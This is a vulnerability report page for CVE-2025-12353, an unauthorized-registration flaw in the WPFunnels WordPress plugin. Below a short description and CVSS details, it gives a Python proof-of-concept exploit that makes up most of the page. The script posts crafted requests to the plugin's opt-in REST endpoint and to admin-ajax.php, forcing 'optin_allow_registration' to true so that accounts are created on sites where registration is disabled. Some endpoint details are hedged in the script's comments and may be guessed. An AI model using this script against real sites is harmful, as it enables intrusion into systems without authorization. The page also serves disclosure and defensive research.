Security Vulnerability Report
CVE-2025-12353 CVSS 5.3 MEDIUM

Published: 2025-11-08 04:15:45
Last Modified: 2026-04-15 00:35:42

Description

The WPFunnels – The Easiest Funnel Builder For WordPress And WooCommerce To Collect Leads And Increase Sales plugin for WordPress is vulnerable to unauthorized user registration in all versions up to, and including, 3.6.2. This is due to the plugin relying on a user controlled value 'optin_allow_registration' to determine if user registration is allowed, instead of the site-specific setting. This makes it possible for unauthenticated attackers to register new user accounts, even when user registration is disabled.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WPFunnels Plugin <= 3.6.2 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import urllib.parse

# CVE-2025-12353 PoC - WPFunnels Unauthorized User Registration
# Target: WordPress site with WPFunnels plugin <= 3.6.2
target_url = "http://target-wordpress-site.com/"

# Step 1: Discover the funnel/optin form endpoint
# Usually found in the funnel page or checkout flow
funnel_endpoint = target_url + "wp-json/wpfunnels/v1/optin/submit"

# Step 2: Prepare malicious registration payload
# Bypass the site's user registration setting by controlling the
# optin_allow_registration parameter
payload = {
    "email": "[email protected]",
    "first_name": "Attacker",
    "last_name": "Test",
    "optin_allow_registration": "true",  # Key parameter that bypasses site settings
    "funnel_id": "1",
    "step_id": "1",
}

# Step 3: Send the malicious request
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
}

try:
    response = requests.post(funnel_endpoint, data=payload, headers=headers, timeout=10)
    # Check if user was registered successfully
    if response.status_code == 200:
        result = response.json()
        if result.get("success") or "user" in str(result).lower():
            print("[+] SUCCESS: User account created despite registration being disabled!")
            print(f"[+] Response: {result}")
        else:
            print("[-] Request sent but registration may have failed")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Alternative: Direct registration form bypass
# If the optin form is embedded in a page
alt_payload = {
    "action": "wpfnl_optin_submit",
    "optin_allow_registration": "1",
    "email": "[email protected]",
    "wpfunnels_optin_data": "1",
}

print("\n[*] Testing alternative endpoint...")
try:
    alt_response = requests.post(
        target_url + "wp-admin/admin-ajax.php",
        data=alt_payload,
        headers=headers,
        timeout=10,
    )
    print(f"[*] Alternative response status: {alt_response.status_code}")
except requests.exceptions.RequestException as e:
    # Same network-error handling as the first request
    print(f"[-] Error: {e}")
```

References

Weakness: CWE-639
Status: Deferred
https://plugins.trac.wordpress.org/changeset/3389604/wpfunnels/trunk/public/class-wpfnl-public.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/4e376c96-47a8-419f-ab45-f7c46510c767?source=cve